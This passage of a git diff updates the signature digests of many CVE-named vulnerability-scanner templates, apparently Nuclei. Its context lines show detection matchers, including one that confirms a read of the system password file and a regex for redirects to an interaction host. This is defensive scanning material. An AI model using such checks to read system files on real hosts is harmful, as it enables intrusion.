d326ebaa1b..f123fb2228 100644 --- a/http/cves/2017/CVE-2017-9506.yaml +++ b/http/cves/2017/CVE-2017-9506.yaml @@ -44,4 +44,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 490a00463044022058eadfb6c31de91652d2e3f2bbe583e23f200f085f6ce06d3612e9a68a41ba30022041068697a3cca76eacdb62a255ad06cd291e017b9ded3cb927ff3024ff4be806:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fdd05fa5c0deeb6b649a252a6d564fd433b6deb4f8aa316ae60e10ee5f4c3d8c02207109e111af0babd6a2066b46a0cee7b17930e26f7c2e5233ae29d50e307be71d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-9791.yaml b/http/cves/2017/CVE-2017-9791.yaml index f919847fa7..44d1fae355 100644 --- a/http/cves/2017/CVE-2017-9791.yaml +++ b/http/cves/2017/CVE-2017-9791.yaml @@ -70,4 +70,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220654157dcb293d2d08454e1fb3aefe554654d48c0a62a31599bc162c7336a57d40221009f20fb2092c4f824918490ed55aa5eba154e0c9e2b3eab3ca83ebe97265d8de4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008990d8265ba9047cd53cff01c7b1e0c645dd4075942379a74e7329fe0316b2c102207b613dfb9ed28eb6ff875229277dd982af169e6990252cad0d8515b85d4c2694:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-9805.yaml b/http/cves/2017/CVE-2017-9805.yaml index d34c4ab1e5..8e33f1882a 100644 --- a/http/cves/2017/CVE-2017-9805.yaml +++ b/http/cves/2017/CVE-2017-9805.yaml @@ -117,4 +117,4 @@ http: - type: status status: - 500 -# digest: 4a0a004730450220122ca0a4f8e33eeadad533cea05bacbd79424b517cf01d019b6050fa9ab39fec022100c82eae0d2f07bab6718f05e23d1d487229f6ec694b7af767f8f22d19898e4c17:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bc5b27f8220ef07fafc0bfb8cb6b3da91db3cd7a60b59c5bc1c4a435b156d580022041740751cdbae48cd39a4854884b7229472bcc58b4eb972ba699f82a9bbd627d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-0296.yaml b/http/cves/2018/CVE-2018-0296.yaml index 87c54074ee..3a466eb67e 100644 --- a/http/cves/2018/CVE-2018-0296.yaml +++ b/http/cves/2018/CVE-2018-0296.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ea84d5647989707121d9843e455bcda230a00c0e7cda6d49b7de19e4413ba116022100a43113bc957e23871b7cf6e215c873464e5b1a00ca3dde56d09993a71a3849a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008af1e43091782e1af2423e141c3da97415d149fd0261a1ab3ce84cc7527b3e130220304cc1e9e1af31da18863343285053049f62e22b903a7fbca5d355f587d5060d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-1000226.yaml b/http/cves/2018/CVE-2018-1000226.yaml index 00cb7da979..7373c504d5 100644 --- a/http/cves/2018/CVE-2018-1000226.yaml +++ b/http/cves/2018/CVE-2018-1000226.yaml @@ -72,4 +72,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022079634a20486dcf525b9d3cb71443762cdac4111b39fe9a6b3449dda9a8e890cc0220445f87f41680fdda13d31abfc6f3e0f0d50d4d2ea8bde289aedb0581313f4c1c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220609deac75fd737e3a2aa1b519296137b11cc191a9d5547b71acb4e8306dd4d73022100d47122768361558b11c3f427fb14b94d25b8186bdd1d3861421e95da2b1b8308:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-1000671.yaml b/http/cves/2018/CVE-2018-1000671.yaml index d43d532004..016da87fa4 100644 --- a/http/cves/2018/CVE-2018-1000671.yaml +++ b/http/cves/2018/CVE-2018-1000671.yaml @@ -42,4 +42,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4b0a00483046022100f1b62b106b4c21342cb736b6e6a4348d2c7b41af9e60f58f06fb0a29d49e4df90221008faeb72dc507eae9f337d9244ac1b75c355da72c479a31bd223d05a0e2e564f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022028e11e18259c866430979aed335d87e9013da4ad6269891e35178b6c514e1d5a022100cf6f6e9a1f027d12c9dd2ab6bdd0b897b3e17b49b313c9d1e85d763df05f738e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-1000861.yaml b/http/cves/2018/CVE-2018-1000861.yaml index d256b42487..1a1c0a8d0f 100644 --- a/http/cves/2018/CVE-2018-1000861.yaml +++ b/http/cves/2018/CVE-2018-1000861.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009b7546d4dccd4fa181fa09bb83e081a6989aead24521c6c0d70f5248899b2a45022100d4022a0e7bcef44ef127c8b6ff5c4b665921acb82e9765f06abe40226f8969a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a6c4995ba633770616bbe918b4285a3447434ee8c0032d8e6efe64ed670b6534022100ad1f5c93698c99068f359f021e95da37a818ef149219d6d27be38ef9eb20f0a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-10095.yaml b/http/cves/2018/CVE-2018-10095.yaml index a7f345b608..2afe7736bf 100644 --- a/http/cves/2018/CVE-2018-10095.yaml +++ b/http/cves/2018/CVE-2018-10095.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e638c1656a8815e12d2d2ad818bc56561808d9c56e7840b10d09443cdb5a4fcb022100acbf92f5d9af6213135181dfd35e83357559a6ab1db83c6db9d5a36579e22287:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201ab33550c9971f20a65798766c82385bc8e6fe158999548e9a1a8124597210e00220214c234455df0e7be4bc246ef96843d14c08d85ad76a5b1cc620b3c7e885d79c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-10141.yaml b/http/cves/2018/CVE-2018-10141.yaml index d8236014a2..a9968160a8 100644 --- a/http/cves/2018/CVE-2018-10141.yaml +++ b/http/cves/2018/CVE-2018-10141.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100bd38808d0d82c779bd0f9e6a95178a5ba15d9077aea8c861a459efcf42e0a10f022078e07f6c8c953b1fa0e4e74b9571886fce453b537e3a95cd9e23bbcb95b8d798:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d08aac5132c6f1ecd5ed168ffed4a16fc09da3e88e4ba23e2ba67ceb409a0d9f02203f9845352398faae5c089124e2aef8dc7eec2b7c1e7af04bd29668b974a4b949:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-10230.yaml b/http/cves/2018/CVE-2018-10230.yaml index 7b20ad3267..acb615a5fd 100644 --- a/http/cves/2018/CVE-2018-10230.yaml +++ b/http/cves/2018/CVE-2018-10230.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205dfe914a909bd06826c5f95c78f072ebc7a003232260c8a72a600053849785ff0220190ab47deef14444724b423984e4a4b3555fda14bdbb101a1f79e98589c2b5f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f62401c6854adf72b1d6c095bdd461658e7b790d8777a4707b2841a1da5bc016022033d5570e096e0b6e18a06bbd68fcf7374b18858f7a242e483f7a3a8a5e5e0382:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-10735.yaml b/http/cves/2018/CVE-2018-10735.yaml index 7133c31465..f04a7953cb 100644 --- a/http/cves/2018/CVE-2018-10735.yaml +++ b/http/cves/2018/CVE-2018-10735.yaml @@ -42,4 +42,4 @@ http: part: body words: - "{{md5(num)}}" -# digest: 4a0a0047304502200c92d03da546dfaff637d87978a98fca7e7ad2a8730f1c69d01d1efe4d0a1553022100aa1ee875fe25ce4048f056bec89e298da5b0b1693920c7496c86380672682886:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201c354727727f1f14efb82c00e579f038af14c48aeabf7b91da8eac187c50396402201f20485af6a91b6ee5cd89d0d1eaeb6c4b73c89af6109f6a1ef4900d2408ed03:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-10736.yaml b/http/cves/2018/CVE-2018-10736.yaml index e063b60ac9..957580521d 100644 --- a/http/cves/2018/CVE-2018-10736.yaml +++ b/http/cves/2018/CVE-2018-10736.yaml @@ -43,4 +43,4 @@ http: part: body words: - "{{md5(num)}}" -# digest: 4a0a00473045022100cd7e0f3fb866e6dbe44663017c33c95074875d8b777ee60e7589bdf239c9fda902203633af43f63f2beca4ba88660112dcdba36ad173ba8fcf87ab43b88a71d0f6be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220380054dbdf1f81a72097d9acc8f469ae8928137e73a3776f9c827da18c2bb79d02205f0ee05e01189342bf924f0915d1da2c211d30e28ff194c9d6576d64bc92770b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-10737.yaml b/http/cves/2018/CVE-2018-10737.yaml index ffdb3f89da..ade789eb5a 100644 --- a/http/cves/2018/CVE-2018-10737.yaml +++ b/http/cves/2018/CVE-2018-10737.yaml @@ -46,4 +46,4 @@ http: part: body words: - "{{md5(num)}}" -# digest: 4a0a0047304502202f133a4099b185a18cfefaa3ceb1a63edcd4505b939310fbe976681c8e6d0e80022100fdc8e91e5b09fe096ee74cd86983878a072ed1e682531d6b936180afec270de8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a0bc85e3468d486bf2bf30d05b0a67161eaff97274ffd8c0a64e1b13d5d6b0f9022067b6ba5d51273f34f28228be2afd9e12f9d7bfa1af1f5db22d81579286f5e99d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-10738.yaml b/http/cves/2018/CVE-2018-10738.yaml index d5ad65b0ee..8d35580bf5 100644 --- a/http/cves/2018/CVE-2018-10738.yaml +++ b/http/cves/2018/CVE-2018-10738.yaml @@ -45,4 +45,4 @@ http: part: body words: - "{{md5(num)}}" -# digest: 4a0a00473045022032ff5ae76fd4bafea18400182ea5d3e6b9e5917a60778bb68121d7724dd9a6eb022100cf064e5aaa2db867e5dd696a41135a985be141a222970604ad3f887173ec0db5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202002a30ee0c0f4bf08b704df011b9339a525693d56454bb8c48535b88d18d9fd02210098c5aabbadb83cf8d1e0536b1ee7278a177447ef3a5a8e61f6162cc2c9d05062:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-10942.yaml b/http/cves/2018/CVE-2018-10942.yaml index a32ac3c2fc..50eba65214 100644 --- a/http/cves/2018/CVE-2018-10942.yaml +++ b/http/cves/2018/CVE-2018-10942.yaml @@ -75,4 +75,4 @@ http: group: 1 regex: - '(.*?)\|\|\|\|' -# digest: 4b0a00483046022100b5c0be9fdc84b3fd3d3c130d309b587ec77fd52be876838eddbba234cc28e715022100b42d341387c2ef8750f784db06da3e27e35d0cff6d77ae88c43ea4725c1ca3b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220306be034b2c6b170199b07e94a79a0d21caeea7a68966b8044a4eb961bdcef07022008a3fe64accf4748a087aca163a0065561fa0c621c7a38123cbfbdcebb0acd9e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-10956.yaml b/http/cves/2018/CVE-2018-10956.yaml index 4cabdcd22c..ebc2d728a8 100644 --- a/http/cves/2018/CVE-2018-10956.yaml +++ b/http/cves/2018/CVE-2018-10956.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022002c0da9e8011d65dab80c630bf30cb61029cb0fc68d1a0b5b7de1f11b65ba50b022100d10b2577aae04e1cb2447339fb423e147328096fafe2e7dfa63a3c87b876f4d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202d36911cca2f0e661928025865ba5961aca8b4135a778b3b6147cafad1439894022068db9ab2aeeef60ece92f735f778f2fe5cfe6fa31e3a76970fdcb9b38777a424:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-11409.yaml b/http/cves/2018/CVE-2018-11409.yaml index 14aa3e5b3e..a60cd22d49 100644 --- a/http/cves/2018/CVE-2018-11409.yaml +++ b/http/cves/2018/CVE-2018-11409.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100cf46cae11d86cd1de5f9dadb6eaacc3a59275c483617d1b09f441671815032620220701cf5a3bee3b755f16c7a9cd42976913debedf9914a004e5acc5ab96c9820ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cd07a4f587efb7a03ad703943030c0d15b0ae71b806c289c224698f4eef6abcb02205ca713c9123f06ef5f09012ecfd93cca39eb076e651b36e07b6e0b15cce9e884:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-11759.yaml b/http/cves/2018/CVE-2018-11759.yaml index ca82948284..8f83a17a36 100644 --- a/http/cves/2018/CVE-2018-11759.yaml +++ b/http/cves/2018/CVE-2018-11759.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100938ac8228345eddd038c98eda80c1dd2c91c011b112fd03901c57fa214b320ae02210087ae996c5447b94a35b1756c4b5fa32348fcb342d1182163594151eac3b250b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022078ef3f356bb7097bb620df80a7fc341078b1a4f2117f493c2e2c4150bfab89a302205caf2b18b096d8dc91b9428af9f345f46ee58283a27eeed1c8367f23da554740:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-11776.yaml b/http/cves/2018/CVE-2018-11776.yaml index 752e155c16..5e0d938ced 100644 --- a/http/cves/2018/CVE-2018-11776.yaml +++ b/http/cves/2018/CVE-2018-11776.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100eaabc7db1807fc929001ebb7e618de3e40c1278290fd8ebf70728eb103cf8c2402203e66b8cb08ccd31c52735f7647ad71582aa2bf25aa797c7fd2c1b7387c995f83:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204e0ee62566aa3e91a90c466211aa77cf3a7faaaf61c04dfb6ad080cfb73ada5f022100c6938323746d6dd5404d2d7c439359379d43c2d3bb98737132e3da382864c3df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-11784.yaml b/http/cves/2018/CVE-2018-11784.yaml index c22d2b2667..a57262a0cc 100644 --- a/http/cves/2018/CVE-2018-11784.yaml +++ b/http/cves/2018/CVE-2018-11784.yaml @@ -55,4 +55,4 @@ http: negative: true status: - 404 -# digest: 4a0a00473045022100ede843a93cd7c543ab76b7e16334cef004e6cb38d973d677b0e973ca732b6d0c022059ab20c40bda233e9cbcb62f029375e1ab0ab8d446fb593bd171dac749c4cb48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a5a5cfa4004a415eeeaf23af29dcff242e7a9064703e9faf951ed3377abec6b00221008f9195e6ee86a3df9eb2828a8b387f0fe801d7c36c0d3c9e74e41a0aa487bc38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-12054.yaml b/http/cves/2018/CVE-2018-12054.yaml index 92eb351c35..8bb2205c18 100644 --- a/http/cves/2018/CVE-2018-12054.yaml +++ b/http/cves/2018/CVE-2018-12054.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100909d49cf51c1283f77ba2b94390ec551a381726ad24bc74122062cdf6ef9d80d02206aa868f2e0d240bebc71f4ce6fca02e97592a2b0c377d466545fb0b3d1cb715d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044021f7bec975f3d095b3baddab7451dd34b90e0a36439d9bbb935d16af9b93fbc7a022100bdc1c62317a0b6eb0312f2df343eba874357e16e348a245794912b81b984aed3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-12296.yaml b/http/cves/2018/CVE-2018-12296.yaml index 1536869918..faed61d456 100644 --- a/http/cves/2018/CVE-2018-12296.yaml +++ b/http/cves/2018/CVE-2018-12296.yaml @@ -51,4 +51,4 @@ http: regex: - '"version": "([0-9.]+)"' part: body -# digest: 4a0a00473045022100eea6124ab2717f89f34103874e7c2f3d232178d78b14c8c4c93c2358076dd57702207a7f9ab3aae93592eb2adfbd00c2e38e3632f23fa3aed618d162a876c7ce255b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c86c7844f9443c6b8d293926410ce41785db4ef5c6b98043f30213d9bbb9270a022070c2af8ad6d2d241e8f1fef3587bcf19840745117be2ff717086e32217b3849f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-12613.yaml b/http/cves/2018/CVE-2018-12613.yaml index fd2453b61a..db7f2489f4 100644 --- a/http/cves/2018/CVE-2018-12613.yaml +++ b/http/cves/2018/CVE-2018-12613.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009b44e1f59ab1d35b1079bbeecba8fabbcc3d662db03dd9feebe186ea1526671f022100c1cd55fbb8aae22f862d0894cf82b08ecdbd72d84263a165885987f10d83a5c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f505a7118be2d4ae5593402023b00539877c2bb9960c839d4af1ec8592d32d2a022100898f6687654b47ef6180a79614cbcd4b65fbb57885be19a59e281e33b6e8002d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-1273.yaml b/http/cves/2018/CVE-2018-1273.yaml index baa5ad7390..2680087e63 100644 --- a/http/cves/2018/CVE-2018-1273.yaml +++ b/http/cves/2018/CVE-2018-1273.yaml @@ -56,4 +56,4 @@ http: - "root:.*:0:0:" - "\\[(font|extension|file)s\\]" condition: or -# digest: 4b0a00483046022100c4cebff0a87b2c4dac5a4d920694980041be72b0635587ca09347a4ef052fefe0221008e29bc099fb5b574cb1c5876f58f5bcbca1c78a5bbe2f82982b9d628b1dac77f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ea11936820b9f4529c8d99962cbc5e7b64e6a1eb2cbe4c1a4b08a7cc5f7c77b102204e8853c9bec62fe0cc9168ee13029ab92b5d931f8e2917827d23227c014eda74:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-12909.yaml b/http/cves/2018/CVE-2018-12909.yaml index b724358105..e9c679b43f 100644 --- a/http/cves/2018/CVE-2018-12909.yaml +++ b/http/cves/2018/CVE-2018-12909.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022039cf28a7d017785e7ae6c8930010bd0a7a23aba9ba82336e80ce2a2202500afd02203e606922ed51c242bc1ee629aa166cd3bd867dc4704ca230d421533b72b9223b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210085a3bebbb5896b4c2395fef5f2ac88789d82f4b78af5460f89fd88905675e204022100d52075cf29d36c1c7db2d11c79ff00da19a5443e4474defc86e17ba20a9c36c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-13379.yaml b/http/cves/2018/CVE-2018-13379.yaml index 08c4189776..21a39b4af8 100644 --- a/http/cves/2018/CVE-2018-13379.yaml +++ b/http/cves/2018/CVE-2018-13379.yaml @@ -46,4 +46,4 @@ http: part: body regex: - '^var fgt_lang =' -# digest: 4a0a004730450220259917bb43137924f23094b16480365fa1e3839c5fca4713af8f2f63008f58d202210082449a7709741b6ff30609ecff6d86e847e2517c01cba5c4694973ee94fa9ca5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206482ae29d2120aa7fa2f03b1c2d264568d1de71b049017f1b396a8237e3cd26502205f50509a64af57b118aa81d4dc221975d88602bde5b9038c06abd4a228ce9770:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-13380.yaml b/http/cves/2018/CVE-2018-13380.yaml index 5ddc4280bb..6ec2abffb3 100644 --- a/http/cves/2018/CVE-2018-13380.yaml +++ b/http/cves/2018/CVE-2018-13380.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210082af42871fa237fbd8e44fca7400eefd815f0228679b14a47eef8e58bf9bd2c30220677acd9c0f102308eef360373ba7b6611d2e1c1a2d5a909ed06667e3a9812e01:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022029dc84d25ce4c51efefde5778038b25b736e73529eb67248b55533fd8a5e718d022100a96094ddfdae1d6af8b3868728c61d8171a31105da21e93697618035febb60d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-14013.yaml b/http/cves/2018/CVE-2018-14013.yaml index fc2aa60f54..15a5d5ea30 100644 --- a/http/cves/2018/CVE-2018-14013.yaml +++ b/http/cves/2018/CVE-2018-14013.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210090246985aa33f0e41c9ed59146b95be1f9cdf7ab26257777ce98c063ed12309c02202b81c53a22187906b5e2321ac991e64fe0ee52372aee7f041ea1d9de847edb66:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203f452be815106a5b1344b236fe91f95275b51fe610e4b73693ce09db62eb4793022066f11fc599bbed0376f5ad47ee7bcc198e92a559577c3c374a6cd019f3b9e762:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-14064.yaml b/http/cves/2018/CVE-2018-14064.yaml index 8c99238867..4f600e373e 100644 --- a/http/cves/2018/CVE-2018-14064.yaml +++ b/http/cves/2018/CVE-2018-14064.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022063bdd1fe9b5c2d2aa2adee684558be85ff6671a613274c6e7a707fb69329681f022100d3107d95cef68cee1d04cac1bedee37ba1d5188c53813eb37ef9251229e9ea99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008514cf6c974cd4186414d7a81d17a4baec226b86cc88c968c4c5300859d00e0802201b2cd5397173847a6d3000d6aefb0514e8d0a01d4806a3c681306587a3e39cc8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-14912.yaml b/http/cves/2018/CVE-2018-14912.yaml index 3a661a3cff..08f212b0c8 100644 --- a/http/cves/2018/CVE-2018-14912.yaml +++ b/http/cves/2018/CVE-2018-14912.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009214b35bc48d118e49903f07e951d276886bb2e963f35ada6608986e8379df6602202b9b26b182e0feccd8855c0eeeefbd4e71305d040621695262cf1b5336fe9b04:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a91696514f764742eec98d1081aef7777203bdfdf7503565adb899edfe889f2a022100d1c9c522a49e9b678fb3d7c542ce0327118466d0d1f02da86043cb9b71db3345:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-14918.yaml b/http/cves/2018/CVE-2018-14918.yaml index 99e6932f5d..38fe0e7799 100644 --- a/http/cves/2018/CVE-2018-14918.yaml +++ b/http/cves/2018/CVE-2018-14918.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ac853014f271b944b9ee20135ae63f4f05560df732d9ffb2d4a315c1298854da02202669480469ad9fa8caf3ecac955cda21d510d1dabc69069dd5fbc3ff497533b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008929837b5939b1ff8e23c3aa918320cecf9fd3b55b4537f678b6fb1cf7adbb78022100fcb09aa8d8b3d8dfad96f607140c838945e4cc52b521e7dfcc4f6d7fb80c5c36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-15138.yaml b/http/cves/2018/CVE-2018-15138.yaml index 4863766182..9f301fb083 100644 --- a/http/cves/2018/CVE-2018-15138.yaml +++ b/http/cves/2018/CVE-2018-15138.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202b0ed4bce15d30705879eea7dd0299bd568936f4c93490a2eb2cf6a120bbec9d022058e551bd65de05595c3d6a81d60313c7062d261e34d7c7466911ba50e8cb87f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200618e5366342cbf2d56d1d6d56e7cec9b447d2d32fd8567a1897a56ede11f2a70220217f8ffccedb2eecd94c33d1a88298514115cd9b8646d39090d7055fd5b56dcd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-15917.yaml b/http/cves/2018/CVE-2018-15917.yaml index ed5edeb9d7..9cd1eb56cc 100644 --- a/http/cves/2018/CVE-2018-15917.yaml +++ b/http/cves/2018/CVE-2018-15917.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203412aba03e7df739713f759fcb37bef1eea1d3999931083f45827e66691d050f022100bfeb476846fd53627a129ee79b9bb245ee5f7a9c8fa80b019225676c03b850b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205047dbc535649894bd8ccb683fd2f2cf11fb5c4fdfcd44b02baed63fb9d24bf102204397b93cbcb1f6730826f342f91cb719a6c621bd3d7fc939738abd541633ce6a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-15961.yaml b/http/cves/2018/CVE-2018-15961.yaml index a154fbc631..6b857b13f0 100644 --- a/http/cves/2018/CVE-2018-15961.yaml +++ b/http/cves/2018/CVE-2018-15961.yaml @@ -84,4 +84,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206c705261b07bb3b5134ebe70f694bcf5598515f94687a58001eccb1f58fb9e6002206cc7bf1c42677820f7b501bd2aeed96acae06ab3780e0481a51780a3a7e97c7c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a68bcb637356d729324efaa847af1c7072a2a575cffc0b1d77d36895e9533d6d0220452e48d827ac18ded3d44c0905f3f38a899724e774a3e7153107b2f60701c656:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16139.yaml b/http/cves/2018/CVE-2018-16139.yaml index 6beb396f94..f1cbceaf0d 100644 --- a/http/cves/2018/CVE-2018-16139.yaml +++ b/http/cves/2018/CVE-2018-16139.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200ed92c577723c47cb124f92446376127d6b6b6fcd2f6431bbbfe68e31a967e7b022017675d53de48db41cb32b1ba9e129efe88f22de8ef6b0bc3627c9470229ff9cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022023dde117662333438c84453a2b78d70f4e34e523adb4977cc91e3b4ca95770d902207d20b575a2e6fc9158e82d114ee21604b003642b35da9588cc82d365a92906c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16159.yaml b/http/cves/2018/CVE-2018-16159.yaml index 6059d6f5b1..94f72485c7 100644 --- a/http/cves/2018/CVE-2018-16159.yaml +++ b/http/cves/2018/CVE-2018-16159.yaml @@ -51,4 +51,4 @@ http: - 'contains(content_type, "application/json")' - 'contains(body, "images") && contains(body, "title")' condition: and -# digest: 490a0046304402204299459be2a55a288065e032b7726f84a36e94e06623cdc89bc6cbfe1f06f73402201a6086d0a7faeced068ec0dd8aa934238754b35510074d06c3671d2b5e93f945:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022039c62ea7189c856952f0a35cfb1c5bcc09fd83a4aae6a766e8357ce6c29625e202204b8b8f1561357042ae671f4d7d5166f074ce46d7d8586fb02316afdd260df3bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16668.yaml b/http/cves/2018/CVE-2018-16668.yaml index 967f04bd8f..4c936e1fe4 100644 --- a/http/cves/2018/CVE-2018-16668.yaml +++ b/http/cves/2018/CVE-2018-16668.yaml @@ -47,4 +47,4 @@ http: - "** Platform sources **" - "** Application sources **" condition: and -# digest: 